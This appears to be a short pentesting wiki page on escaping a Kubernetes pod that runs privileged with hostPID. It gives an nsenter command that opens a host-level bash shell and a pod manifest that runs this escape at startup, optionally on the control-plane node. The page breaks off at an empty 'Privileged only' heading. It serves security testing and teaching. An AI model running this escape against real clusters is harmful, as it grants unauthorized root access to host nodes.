39 lines
1.0 KiB
Markdown
39 lines
1.0 KiB
Markdown
|
# Pod Escape Privileges
|
||
|
|
|
||
|
|
## Privileged and hostPID
|
||
|
|
|
||
|
|
With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\
|
||
|
|
Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp).
|
||
|
|
|
||
|
|
Just executing something like the following will allow you to escape from the pod:
|
||
|
|
|
||
|
|
```bash
|
||
|
|
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
|
||
|
|
```
|
||
|
|
|
||
|
|
Configuration example:
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
apiVersion: v1
|
||
|
|
kind: Pod
|
||
|
|
metadata:
|
||
|
|
name: priv-and-hostpid-exec-pod
|
||
|
|
labels:
|
||
|
|
app: pentest
|
||
|
|
spec:
|
||
|
|
hostPID: true
|
||
|
|
containers:
|
||
|
|
- name: priv-and-hostpid-pod
|
||
|
|
image: ubuntu
|
||
|
|
tty: true
|
||
|
|
securityContext:
|
||
|
|
privileged: true
|
||
|
|
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
|
||
|
|
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
|
||
|
|
```
|
||
|
|
|
||
|
|
## Privileged only
|
||
|
|
|
||
|
|
|
||
|
|
|